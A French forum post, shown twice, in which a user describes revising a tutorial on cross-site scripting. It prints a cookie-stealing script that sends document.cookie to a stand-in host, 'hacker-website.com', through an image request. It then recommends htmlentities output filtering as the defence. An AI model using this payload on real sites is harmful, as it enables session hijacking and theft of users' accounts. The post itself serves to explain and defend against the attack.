23-12-2010, 04:04 PM
(Modification du message : 23-12-2010, 04:35 PM par Sephi-Chan.)
Bonne initiative.
J'ai commencé à retoucher un peu l'article pour le corriger et pour améliorer certains points. Par exemple, j'ai modifié le script de vol par :
C'est une technique bien plus discrète que le document.write !
J'ai également indiqué comment on pouvait éviter ce problème : filtrer (à l'affichage) toutes les données saisies par les utilisateurs grâce à la fonction htmlentities.
Sephi-Chan
J'ai commencé à retoucher un peu l'article pour le corriger et pour améliorer certains points. Par exemple, j'ai modifié le script de vol par :
<script type="text/javascript">
var image = new Image();
image.src = "http://hacker-website.com/hijack_session.php?".concat(escape(document.cookie));
</script>
C'est une technique bien plus discrète que le document.write !
J'ai également indiqué comment on pouvait éviter ce problème : filtrer (à l'affichage) toutes les données saisies par les utilisateurs grâce à la fonction htmlentities.
Sephi-Chan